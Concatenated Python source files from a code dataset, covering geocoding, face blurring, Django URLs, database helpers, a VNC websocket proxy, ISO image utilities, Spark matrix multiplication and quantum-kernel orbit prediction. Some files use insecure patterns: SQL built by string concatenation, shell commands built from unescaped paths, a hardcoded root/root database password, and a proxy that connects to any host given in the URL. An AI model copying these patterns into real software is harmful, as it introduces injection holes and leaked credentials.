ascii_name, alternate_names, lat, lng, feat_class, feat_code, \\\n country_code, a1, a2, a3, population, dem, elevation, admin_region, mod_date = split\n go = True\n if go:\n admin_region_splitted = admin_region.split(\"/\")\n state = None\n county = None\n continent = None\n if len(admin_region_splitted) == 2:\n continent, county = admin_region_splitted\n elif len(admin_region_splitted) == 3:\n continent, state, county = admin_region_splitted\n self.lookup_id += 1\n population = int(population)\n if population >= min_population:\n lat = float(lat)\n lng = float(lng)\n\n cities[self.lookup_id] = {'location': name,\n 'lat': lat,\n 'lng': lng,\n 'population': population,\n 'type': 'city',\n 'country': country_code,\n 'continent': continent,\n \"county\": county}\n if state:\n cities[self.lookup_id]['state'] = state\n\n all_possible_names = [name, ascii_name] + [n for n in alternate_names.split(',')]\n for n in all_possible_names:\n if n not in cities_lookup:\n cities_lookup[n] = self.lookup_id\n if population > cities[cities_lookup[n]]['population']:\n cities_lookup[n] = self.lookup_id\n\n return cities, cities_lookup\n\n def load_states(self):\n logger.info('')\n \"\"\"\n Loads states from file and generates two dictionaries.\n First dictionary:\n -keys are lookup ids\n -values are location data\n Second dictionary:\n -keys are all different location names\n -values are lookup ids\n :return: dict, dict\n \"\"\"\n f = open(os.path.join(FILE_PATH, \"obj\", \"states.json\"), 'r')\n j = json.loads(f.read())\n states = {}\n states_lookup = {}\n for i in range(len(j)):\n self.lookup_id += 1\n states[self.lookup_id] = {'location': j[i]['state'], 'lat': j[i]['latitude'], 'lng': j[i]['longitude'],\n 'type': 'state', \"country\": \"US\"}\n states_lookup[j[i]['state']] = self.lookup_id\n return states, states_lookup\n\n def get_lookup_id(self, string):\n if string.lower() in self.locations_lookup:\n ids = self.locations_lookup[string.lower()]\n logger.debug(string + '-->' + str(ids))\n return ids\n return None\n\n def get_location_from_id(self, str_id):\n\n if str_id in self.locations:\n out = self.locations[str_id]\n # print(out)\n logger.debug(\n str(str_id) + '-->' + out['location'] + '(lat:' + str(out['lat']) + ',lng:' + str(out['lng']) + ')')\n return out\n return None\n\n def get_location(self, string):\n logger.debug('')\n lookup_id = self.get_lookup_id(string)\n if lookup_id:\n loc = self.get_location_from_id(lookup_id)\n if loc:\n return loc\n return None\n\n\ndef get_locations(article_list, location_loader, nlp):\n logger.info('')\n \"\"\"\n Takes in a string and outputs list of locations that are present in string.\n :param logger_internal:\n :param location_loader:\n :param string: String to be parsed.\n :return: list of a single dictionary per location\n \"\"\"\n\n t = tqdm.tqdm(\n total=len(article_list),\n bar_format=\"Spacy processing |{bar}|{n_fmt}/{total_fmt} {percentage:3.0f}% {rate_fmt}\")\n\n for a in article_list:\n\n string = a['title']\n if \"description\" in a:\n string += \". \" + a[\"description\"]\n doc = nlp(string)\n matches = [ent.text for ent in doc.ents if ent.label_ == \"LOC\" or ent.label_ == \"GPE\"]\n occuring_ids = {}\n for name in matches:\n count = string.count(name)\n lookup_id = location_loader.get_lookup_id(name)\n if lookup_id != None:\n if lookup_id in occuring_ids:\n occuring_ids[lookup_id] += count\n else:\n occuring_ids[lookup_id] = count\n out = []\n for occurring_id, count in occuring_ids.items():\n d = location_loader.get_location_from_id(occurring_id)\n d['count'] = count\n out.append(d)\n out.sort(key=lambda x: x['count'], reverse=True)\n # logstring= '\\n'+string+'\\n'+str(matches)+'\\n'+str([l for l in out])\n # logstring = logstring.encode().decode(\"ascii\",'replace')\n # logger_internal.info(logstring)\n a['locations'] = out\n t.update()\n t.close()\n return article_list\n\n\ndef string_found(substring, string):\n logger.info('')\n \"\"\"Returns True if substring word is found within a string sentence\n (has to be surrounded by whitespace).\n \n \n Arguments:\n substring {str} -- word\n string {str} -- sentence\n \n Returns:\n bool -- True or False\n \"\"\"\n if re.search(r\"\\b\" + re.escape(substring) + r\"\\b\", string):\n return True\n return False\n\n\ndef geocode_results(articles,location_loader=None):\n logger.info('')\n \"\"\"\n Function that takes a list of article dictionaries,\n and returns the same list with updated article dictionaries, that now include geo data.\n :param articles: list of dicts\n :return: list of dicts (geocoded)\n \"\"\"\n\n # log_path = os.path.join(FILE_PATH,'logs','locations','%s.log' % utils.date_to_string(datetime.datetime.now(),'%Y-%m-%dT%H-%M-%SZ'))\n # fh = logging.FileHandler(log_path,'w','utf-8')\n # old_handlers = logger.handlers\n # logger.handlers = []\n # logger.addHandler(fh)\n # logger.propagate = False\n if not location_loader:\n logger.warning('Loading location loader from within this function, is unoptimised behaviour.')\n location_loader = LocationLoader()\n nlp = spacy.load('en', disable=['parser', 'tagger', 'textcat', 'tokenizer'])\n articles_tagged = get_locations(articles, location_loader, nlp)\n return articles_tagged\n\n\ndef geocode_string(string):\n logger.info('')\n # locations,locations_lookup,locations_lookup_set,countries_cca2 = load_locations_dicts()\n location_loader = LocationLoader()\n nlp = spacy.load('en', disable=['parser', 'tagger', 'textcat', 'tokenizer'])\n return get_locations([{'title': string}], location_loader, nlp)\n\n# print(geocode_string('Tunisia'))\n","sub_path":"locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":14233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"625395583","text":"\"\"\"Crops and rotates Vuze images\"\"\"\n\nimport os\nimport cv2\nimport argparse\nimport multiprocessing as mp\nfrom multiprocessing import Queue\n\nfrom datetime import datetime\nstartTime = datetime.now()\n\ndef face_proc(q):\n while True:\n try:\n fname = q.get(True, 1)\n print('Processing : ' + input_path + '/' + fname)\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n H, W = img.shape[:2]\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(1,1),\n flags = cv2.CASCADE_SCALE_IMAGE\n )\n for (x, y, w, h) in faces:\n res = cv2.blur(img[y:y+h, x:x+w] , (35,35))\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 2)\n img[y:y+h, x:x+w] = res\n\n out_fname = \"../\" + output_folder + '/' + fname\n if os.path.isfile(out_fname):\n continue\n cv2.imwrite(out_fname, img)\n \n except:\n return\n\nparser = argparse.ArgumentParser(\"Detects faces in panos\")\nparser.add_argument('input_path', type=str, help='Path to folder containing the images')\nparser.add_argument('output_folder', type=str, help='Output folder')\nargs = parser.parse_args()\n\nprint(\"Path : \" + args.input_path)\nif not os.path.exists(args.input_path):\n parser.error(\"Input folder does not exist or does not contain any images\")\nprint(args.input_path)\n\ninput_path = args.input_path\noutput_folder = args.output_folder\nos.chdir(input_path)\nif not os.path.exists(\"../\" + output_folder):\n os.mkdir(\"../\" + output_folder)\n\ncascPath = \"../haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\ntotal_frames = len(os.listdir())\nq = Queue()\n\nnum_procs = 8\nprocs = []\n\nfor i in range(num_procs):\n p = mp.Process(target=face_proc, args=(q,))\n procs.append(p)\n p.start()\n\nfnames = [fname for fname in os.listdir() if fname != \".DS_Store\"]\nwhile fnames:\n if q.empty():\n q.put(fnames.pop())\n\nfor p in procs:\n p.join()\n\nprint(datetime.now() - startTime)\n","sub_path":"data/scripts/facedetect_parallel.py","file_name":"facedetect_parallel.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"235338949","text":"\"\"\"car_db URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom app.views import CarList, DetailsCar, CarCreate, CarUpdate, CarDelete, HomeView, basket, CartView, delete_car_cart, send_order\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', HomeView.as_view(), name='home'),\n url(r'^list/$', CarList.as_view() ),\n url(r'^list/details/(?P[0-9]+)/$', DetailsCar.as_view()),\n url(r'^create/$', CarCreate.as_view()),\n url(r'^update/(?P[0-9]+)/$', CarUpdate.as_view()),\n url(r'^delete/(?P[0-9]+)/$', CarDelete.as_view()),\n url(r'^list/add/$', basket),\n url(r'^cart/del/$', delete_car_cart),\n url(r'^cart/$', CartView.as_view()),\n url(r'cart/send/$', send_order),\n url(r'^i18n/', include('django.conf.urls.i18n')),\n url(r'^api/',include('api.urls')),\n\n # url(r'^/?query=([\\w-]+)/$', CarList.as_view()),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n","sub_path":"car_db/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"16126073","text":"from starlette_auth.tables import scope, user_scope, user\nfrom starlette_core.database import database\n\n\nasync def get_user_by_email(email: str):\n query = user.select().where(user.c.email == email)\n return await database.fetch_one(query=query)\n\n\nasync def get_user_by_id(id: int):\n query = user.select().where(user.c.id == id)\n return await database.fetch_one(query=query)\n\n\nasync def get_user_scopes(id: int):\n join = scope.join(user_scope)\n query = scope.select().select_from(join).where(user_scope.c.user_id == id)\n return await database.fetch_all(query=query)\n\n\nasync def update_user(id: int, **values):\n query = user.update().values(**values).where(user.c.id == id)\n return await database.execute(query=query)\n","sub_path":"starlette_auth/utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"480911490","text":"import os\nimport glob\n\nINPUT_DIR = \"videos/inputs\"\nSTR_TO_REPLACE = \"CBBV1 \"\n\ncurrent_path = os.getcwd()\nfiles = glob.glob(\"{}/*\".format(INPUT_DIR))\n\nfor file_ in files:\n new_file_name = file_.replace(STR_TO_REPLACE, \"\")\n os.rename(os.path.join(current_path, file_),\n os.path.join(current_path, new_file_name))\n","sub_path":"file_renamer.py","file_name":"file_renamer.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"469478215","text":"import mysql.connector\n\n\nclass Database(object):\n myDatabase = None\n my_cursor = None\n\n def __init__(self):\n self.myDatabase = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n database=\"corona_bot\"\n )\n self.my_cursor = self.myDatabase.cursor()\n\n def add_status(self, user_id, parent_id):\n sql = \"INSERT INTO track_user (user_id, parent_id) VALUES (%s, %s)\"\n val = (user_id, parent_id)\n self.my_cursor.execute(sql, val)\n self.myDatabase.commit()\n print(\"user registered\")\n\n def check_user(self, user_id):\n sql = \"SELECT * FROM track_user WHERE user_id ='\" + str(user_id) + \"'\"\n self.my_cursor.execute(sql)\n my_result = self.my_cursor.fetchall()\n if len(my_result) > 0:\n return True\n else:\n return False\n\n def get_parent_id(self, user_id):\n sql = \"SELECT parent_id FROM track_user WHERE user_id ='\" + str(user_id) + \"'\"\n self.my_cursor.execute(sql)\n my_result = self.my_cursor.fetchall()\n return my_result[0][0]\n\n def update_parent_id(self, user_id, parent_id):\n print(\"From DB:\", parent_id)\n sql = \"Update track_user set parent_id = '\" + str(parent_id) + \"' where user_id = '\" + str(user_id) + \"'\"\n self.my_cursor.execute(sql)\n self.myDatabase.commit()\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29060089","text":"# (C) Copyright (2018,2020) Hewlett Packard Enterprise Development LP\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom subprocess import CalledProcessError\nimport shutil\nimport subprocess\nimport threading\nfrom time import sleep\nimport requests\nimport os\nimport json\nfrom datetime import datetime\nfrom datetime import timedelta\n\ndef mount_iso_image(file_name, org_path):\n \"\"\"This function is to mount the file to the desired path\n \n Arguments:\n file_name {string} -- name of the file to be mounted\n org_path {string} -- path of the mount point\n \"\"\"\n create_dir_exist(org_path)\n try:\n args = [\"sudo\", \"mount\", \"-o\", \"loop\", file_name, org_path]\n proc = execute_linux_command(args)\n return proc.returncode\n except CalledProcessError as subprcer:\n print(\"Failure: Subprocess error occurred while mounting iso image {}\".format(subprcer))\n return 1\n except Exception as er:\n print(\"Failure: Error while mounting iso image {}\".format(er))\n return 1\n\n\ndef copy_iso_contents(origpath, newpath):\n \"\"\"This function is to copy the contents of the ISO image to the desired location\n \n Arguments:\n origpath {string} -- source path\n newpath {string} -- destination path\n \"\"\"\n try:\n if os.path.isdir(newpath):\n folder_name = (newpath.split('/'))[2]\n file_path= \"files/\"+folder_name\n if os.path.isdir(file_path):\n os.system(\"sudo rsync -a --remove-source-files \"+newpath+\" files/\"+folder_name+\"/\")\n os.system(\"sudo find \"+newpath+\" -type d -empty -delete\")\n else:\n os.system(\"sudo mv -f \"+newpath+\" files/\")\n shutil.copytree(origpath, newpath)\n except Exception as e:\n print(\"Failure: Error occured while copying iso contents {}\".format(e))\n\n\ndef unmount_iso_image(org_path):\n \"\"\"This function is to unmount ISO fimage on the installer machine\n \n Arguments:\n org_path {string} -- path to the mount point \n \"\"\"\n try:\n args = [\"sudo\", \"umount\", org_path]\n proc = execute_linux_command(args)\n if proc.returncode == 0:\n shutil.rmtree(org_path)\n return proc.returncode\n except CalledProcessError as subprcer:\n print(\"Failure: Subprocess error occurred while unmounting iso image {}\".format(subprcer))\n return 1\n except Exception as er:\n print(\"Failure: Error while unmounting iso image {}\".format(er))\n return 1\n\n\ndef get_custom_image_url(http_url, os_type, server_serial_number):\n \"\"\"This function is to generate URL for the custom OS ISO file based on the type of OS and server serial number\n \n Arguments:\n http_url {string} -- HTTP server base URL\n os_type {string} -- Type of the opertaing system \n server_serial_number {string} -- Server serial number\n \n Returns:\n string -- custom ISO URL\n \"\"\"\n return http_url + os_type + server_serial_number + \".iso\"\n\n\ndef get_custom_image_path(http_path, os_type, server_serial_number):\n \"\"\"This function is to generate path for the custom OS ISO file based on the type of OS and server serial number\n \n Arguments:\n http_path {string} -- HTTP server base file path\n os_type {string} -- Type of the opertaing system \n server_serial_number {string} -- Server serial number\n \n Returns:\n string -- custom ISO path\n \"\"\"\n return os.path.join(http_path, os_type + server_serial_number + \".iso\")\n\n\ndef get_custom_image_name(os_type, server_serial_number):\n \"\"\"This function is to generate name for the custom OS ISO file based on the type of OS and server serial number\n \n Arguments:\n os_type {string} -- Type of the opertaing system \n server_serial_number {string} -- Server serial number\n \n Returns:\n string -- custom ISO filename\n \"\"\"\n return os_type + server_serial_number + \".iso\"\n\n\ndef get_custom_kickstart_url(http_url, os_type, server_serial_number):\n \"\"\"This function is to generate URL for the custom kickstart file based on the type of OS and server serial number\n \n Arguments:\n http_url {string} -- HTTP server base URL\n os_type {string} -- Type of the opertaing system \n server_serial_number {string} -- Server serial number\n \n Returns:\n string -- custom kickstart URL\n \"\"\"\n return http_url + os_type + server_serial_number + \"_ks.cfg\"\n\n\ndef get_custom_kickstart_path(http_path, os_type, server_serial_number):\n \"\"\"This function is to generate path for the custom kickstart file based on the type of OS and server serial number\n \n Arguments:\n http_path {string} -- HTTP server base file path\n os_type {string} -- Type of the opertaing system\n server_serial_number {string} -- Server serial number\n \n Returns:\n string -- custom kickstart path\n \"\"\"\n return os.path.join(http_path, os_type + server_serial_number + \"_ks.cfg\")\n\n\ndef get_custom_kickstart_name(os_type, server_serial_number):\n \"\"\"This function is to generate a name for the custom kickstart file based on the type of OS and server serial number\n \n Arguments:\n os_type {string} -- Type of the opertaing system - RHEL\n server_serial_number {string} -- Server serial number\n \n Returns:\n string -- custom kickstart filename\n \"\"\"\n return os_type + server_serial_number + \"_ks.cfg\"\n\n\ndef create_dir_exist(dir_path):\n \"\"\"This function is to create a folder if it doesn't already exist\n \n Arguments:\n dir_path {string} -- Path to a folder to be created\n \"\"\"\n try:\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path)\n except Exception as er:\n print(\"Failure: Error occurred while creating the dir {}\".format(er))\n\n\ndef move_file(filepath):\n \"\"\"This function is to move a file to temp folder\n \n Arguments:\n filepath {string} -- Path of a file to be moved\n \"\"\"\n try:\n if os.path.exists(filepath):\n os.system(\"sudo mv -f \"+filepath+ \" files/\")\n except Exception as e:\n print(\"Failure: Error occured while moving the file \".format(e))\n\ndef move_on_exist_file(file_path):\n \"\"\"This function is to move an existing file\n \n Arguments:\n file_path {string} -- Path of an existing file to be moved\n \"\"\"\n try:\n print(\"Searching file {}\".format(file_path))\n if os.path.isfile(file_path):\n move_file(file_path)\n except Exception as er:\n print(\"Failure: Error occurred while moving the file {} \".format(er))\n\n\ndef move_temp_folder(temppath):\n \"\"\"\n This function is to move a folder\n Arguments:\n temppath {string} -- Path of the folder to be moved\n \"\"\"\n try:\n isDir = os.path.isdir(temppath)\n if isDir:\n os.system(\"sudo mv -f \"+temppath+ \" files/\")\n except Exception as ex:\n print(\"Failure: Error occurred while moving {}\".format(ex))\n\n\ndef execute_linux_command(args):\n \"\"\"\n This function is to execute linux commands \n \"\"\"\n return subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=True)\n\n\ndef is_iso_image(filename):\n \"\"\"\n This function is to check if the given filename is a iso image \n Arguments:\n filename {string} -- file name of the ISO image\n \n Returns:\n Boolean -- Returns True if the given filename is ISO image and False if given filename is not an ISO image\n \"\"\"\n try:\n if os.path.splitext(filename)[1] == \".iso\":\n return True\n return False\n except Exception as e:\n print(\"Failure: Error occured while validating iso image filename {}\".format(e) )\n return False\n\n\ndef is_iso_file_present(image_url):\n \"\"\"\n \n Arguments:\n image_url {string} -- URL of the OS image\n \n Returns:\n Boolean -- Returns True if the ISO file is present on the remote location. Returns False if the ISO image is not present on the remote location\n \"\"\"\n try:\n requests.packages.urllib3.disable_warnings()\n file_head = requests.head(image_url, verify=False)\n if file_head.status_code == 200:\n return True\n except Exception as e:\n print(\"Failure: ISO file not preset on the remote location {}\".form)\n return False\n return False","sub_path":"DL/scalable/os_deployment/deploy_esxi/image_operations.py","file_name":"image_operations.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"140595110","text":"import re\nfrom pyspark import SparkConf, SparkContext\nconf = SparkConf()\nsc = SparkContext(conf = conf)\n\nA = sc.textFile(\"A.txt\")\nB = sc.textFile(\"B.txt\")\n\nmat = A.map(lambda l: re.split(\",\", l))\nmat = mat.map(lambda l: [int(e) for e in l])\n\n\ndef reduce_j(l):\n for e in l:\n yield e[1][1], (e[0], e[1][0])\n\n\nmat1 = mat.map(lambda l: [(l[0], (l[i], i)) for i in range(1, len(l))])\nmat2 = mat1.flatMap(lambda l: reduce_j(l))\n\nvec = B.map(lambda l: re.split(\",\", l))\nvec = vec.map(lambda l: [int(e) for e in l])\nvec1 = vec.flatMap(lambda l: [(i, l[i]) for i in range(1, len(l))])\n\nmat3 = mat2.join(vec1)\nmat4 = mat3.map(lambda l: (l[1][0][0], l[1][0][1] * l[1][1]))\nprod = mat4.reduceByKey(lambda x, y: x+y)\n\nprint(\"The matrix A is:\", mat.collect())\nprint(\"The vector B is:\", vec.collect())\nprint(\"Product of matrix and vector is:\", prod.collect())\n","sub_path":"HW4/spark_matrix_multiplication.py","file_name":"spark_matrix_multiplication.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"86431685","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright 2013 Red Hat\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport signal\nimport gettext\nimport base64\nimport json\nimport datetime\nimport urllib\nimport Cookie\n\nimport websockify as wsproxy\nimport socket\n\nimport logging \n \n#设置一个日志输出文件 \nlog_filename=\"/log/test_log.txt\" \n \n#设置日志输出格式 \nlog_format=' [%(asctime)s] %(message)s' \n\n#将日志文件格式化 \n#logging.basicConfig (format=log_format,datafmt='%Y-%m-%d %H:%M:%S %p',level=logging.DEBUG,filename=log_filename,filemode='a') \n\n#cpu使用率 \ncpu_persent='start test....'\n#logging.debug(cpu_persent) \n \n\nclass OvirtWebSocketProxy(wsproxy.WebSocketProxy):\n \"\"\"\"\n Websocket proxy for usage with oVirt engine.\n Leverages websocket.py by Joel Martin\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n wsproxy.WebSocketProxy.__init__(self, *args, **kwargs)\n\n def new_client(self):\n \"\"\"\n Called after a new WebSocket connection has been established.\n \"\"\"\n self.msg('my new client:'+__name__+\" \"+self.path)\n\n \n try:\n token = self.path[1:]\n token_arr = token.split(':')\n host = token_arr[0]\n port = token_arr[1]\n except:\n logging.debug('----None---None-----except')\n host = None\n port = None\n\n self.msg(\"my connecting to-: %s:%s\" % (host, port))\n tsock = self.socket(host, port, connect=True)\n\n if self.verbose and not self.daemon:\n print(self.traffic_legend)\n\n # Start proxying\n try:\n self.do_proxy(tsock)\n except:\n if tsock:\n tsock.shutdown(socket.SHUT_RDWR)\n tsock.close()\n self.vmsg(\"%s:%s: Target closed\" % (host, port))\n raise\n\nif __name__ == '__main__':\n # Create and start the NovaWebSockets proxy\n server = OvirtWebSocketProxy(listen_host='0.0.0.0',\n listen_port='6100',\n source_is_ipv6=False,\n verbose=True,\n cert='self.pem',\n key=None,\n ssl_only=False,\n daemon=False,\n record=False,\n web=False,\n target_host='ignore',\n target_port='ignore',\n wrap_mode='exit',\n wrap_cmd=None)\n server.start_server()\n\n\n# vim: expandtab tabstop=4 shiftwidth=4\n","sub_path":"noVnc_spice/websocket-proxy_old.py","file_name":"websocket-proxy_old.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"584929021","text":"import orbit_prediction.spacetrack_etl as etl\nimport orbit_prediction.ml_model as ml\nimport orbit_prediction.build_training_data as training\n\nimport kernels.quantum as q_kernel\nimport kernels.classical as c_kernel\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\nfrom sklearn.svm import SVR\n\nSPACETRACK_USERNAME='username@email.com'\nSPACETRACK_PASSWORD='password'\n\nN_PRED_DAYS = 1\nEARTH_RAD = 6.378e6\nMEAN_ORBIT_SPEED = 7800.\nSECONDS_IN_DAY = 60.*60.*24.\n\nplt.rcParams.update({'font.size': 20})\n\ndef query_norm_X_data(n_data, X_data_raw):\n X_data = np.zeros((n_data,13))\n X_data[:,0] = X_data_raw['elapsed_seconds']/(N_PRED_DAYS*SECONDS_IN_DAY)\n X_data[:,1] = X_data_raw['start_r_x']/(2.*EARTH_RAD)\n X_data[:,2] = X_data_raw['start_r_y']/(2.*EARTH_RAD)\n X_data[:,3] = X_data_raw['start_r_z']/(2.*EARTH_RAD)\n X_data[:,4] = X_data_raw['start_v_x']/(MEAN_ORBIT_SPEED)\n X_data[:,5] = X_data_raw['start_v_y']/(MEAN_ORBIT_SPEED)\n X_data[:,6] = X_data_raw['start_v_z']/(MEAN_ORBIT_SPEED)\n X_data[:,7] = X_data_raw['physics_pred_r_x']/(2.*EARTH_RAD)\n X_data[:,8] = X_data_raw['physics_pred_r_y']/(2.*EARTH_RAD)\n X_data[:,9] = X_data_raw['physics_pred_r_z']/(2.*EARTH_RAD)\n X_data[:,10] = X_data_raw['physics_pred_v_x']/(MEAN_ORBIT_SPEED)\n X_data[:,11] = X_data_raw['physics_pred_v_y']/(MEAN_ORBIT_SPEED)\n X_data[:,12] = X_data_raw['physics_pred_v_z']/(MEAN_ORBIT_SPEED)\n return X_data\n\ndef query_norm_Y_data(n_data, Y_data_raw):\n Y_data = np.zeros((n_data,6))\n Y_data[:,0] = Y_data_raw['physics_err_r_x']/(2.*EARTH_RAD)\n Y_data[:,1] = Y_data_raw['physics_err_r_y']/(2.*EARTH_RAD)\n Y_data[:,2] = Y_data_raw['physics_err_r_z']/(2.*EARTH_RAD)\n Y_data[:,3] = Y_data_raw['physics_err_v_x']/(MEAN_ORBIT_SPEED)\n Y_data[:,4] = Y_data_raw['physics_err_v_y']/(MEAN_ORBIT_SPEED)\n Y_data[:,5] = Y_data_raw['physics_err_v_z']/(MEAN_ORBIT_SPEED)\n return Y_data\n\n# Returns unit code normalized input and output data for SVM from train_test_data\ndef get_svm_input_output(data):\n num_train = data['X_train']['elapsed_seconds'].shape[0]\n num_test = data['X_test']['elapsed_seconds'].shape[0]\n X_train = query_norm_X_data(num_train, data['X_train'])\n X_test = query_norm_X_data(num_test, data['X_test'])\n Y_train = query_norm_Y_data(num_train, data['y_train'])\n Y_test = query_norm_Y_data(num_test, data['y_test'])\n return X_train, X_test, Y_train, Y_test\n\ndef main():\n # ## Importing ISS data\n # spacetrack_client = etl.build_space_track_client( SPACETRACK_USERNAME,\n # SPACETRACK_PASSWORD )\n # spacetrack_etl = etl.SpaceTrackETL(spacetrack_client)\n # iss_orbit_data = spacetrack_etl.build_leo_df( norad_ids=['25544'],\n # last_n_days=365,\n # only_latest=None )\n # physics_model_predicted_orbits = training.predict_orbits( iss_orbit_data,\n # last_n_days=None,\n # n_pred_days=N_PRED_DAYS )\n # pickle.dump(physics_model_predicted_orbits, open(\"data/iss_data.pkl\")\n # physics_model_errors = training.calc_physics_error(physics_model_predicted_orbits)\n # train_test_data = ml.build_train_test_sets(physics_model_errors, test_size=0.25)\n # X_train, X_test, Y_train, Y_test = get_svm_input_output(train_test_data)\n # pickle.dump( X_train , open( \"data/X_train.pkl\", \"wb\" ) )\n # pickle.dump( X_test , open( \"data/X_test.pkl\", \"wb\" ) )\n # pickle.dump( Y_train , open( \"data/Y_train.pkl\", \"wb\" ) )\n # pickle.dump( Y_test , open( \"data/Y_test.pkl\", \"wb\" ) )\n\n # Loading cleaned train and test data\n X_train = pickle.load( open( \"data/X_train.pkl\", \"rb\" ) )\n X_test = pickle.load( open( \"data/X_test.pkl\", \"rb\" ) )\n Y_train = pickle.load( open( \"data/Y_train.pkl\", \"rb\" ) )\n Y_test = pickle.load( open( \"data/Y_test.pkl\", \"rb\" ) )\n\n # Calculating Gram matrix using quantum kernel\n X_train_gram = q_kernel.calc_gram_sym(X_train)\n np.save('./data/quantum/X_train_gram_1_rep_0_bit_scale_08.npy',X_train_gram)\n X_test_gram = q_kernel.calc_gram(X_test,X_train)\n np.save('./data/quantum/X_test_gram_1_rep_0_bit_scale_08.npy',X_test_gram)\n\n # Fitting Gram matrix using support vector regression\n X_train_gram = np.load('./data/quantum/X_train_gram_1_rep_0_bit_scale_08.npy')\n X_test_gram = np.load('./data/quantum/X_test_gram_1_rep_0_bit_scale_08.npy' )\n svrs = []\n scales = []\n gram_exp = 2.0\n N = X_train_gram.shape[0]\n N_a = N - 100\n for idx in range(0,6):\n x1 = np.power(X_train_gram[0:N_a,0:N_a],gram_exp)\n y1 = Y_train[0:N_a,idx]\n x2 = np.power(X_train_gram[N_a+1:N,0:N_a],gram_exp)\n y2 = Y_train[N_a+1:N,idx]\n svr = SVR(kernel='precomputed',C=1e-2,epsilon=1e-5)\n svr.fit(x1,y1)\n svrs.append(svr)\n Y_pred = svr.predict(x2)\n v = y2\n w = Y_pred\n m,b = np.polyfit(v,w,1)\n scales.append(m)\n\n # Plotting Final Results for X position\n idx = 0\n var_str = str(idx)\n Y_pred = svrs[idx].predict(np.power(X_test_gram[:,0:N_a],gram_exp))\n Y_pred = (1./scales[idx])*Y_pred\n rlim = np.max(np.abs(Y_test[0:Y_test.shape[0],idx]))\n plt.figure(figsize=(8,7))\n plot_r = np.arange(-rlim,rlim,0.001)\n v = Y_test[0:Y_test.shape[0],idx]\n w = Y_pred\n correlation_matrix = np.corrcoef(v,w)\n print(correlation_matrix[0,1])\n diff = w-v\n print(np.sqrt(np.mean(w*w))*2*EARTH_RAD/1000.)\n 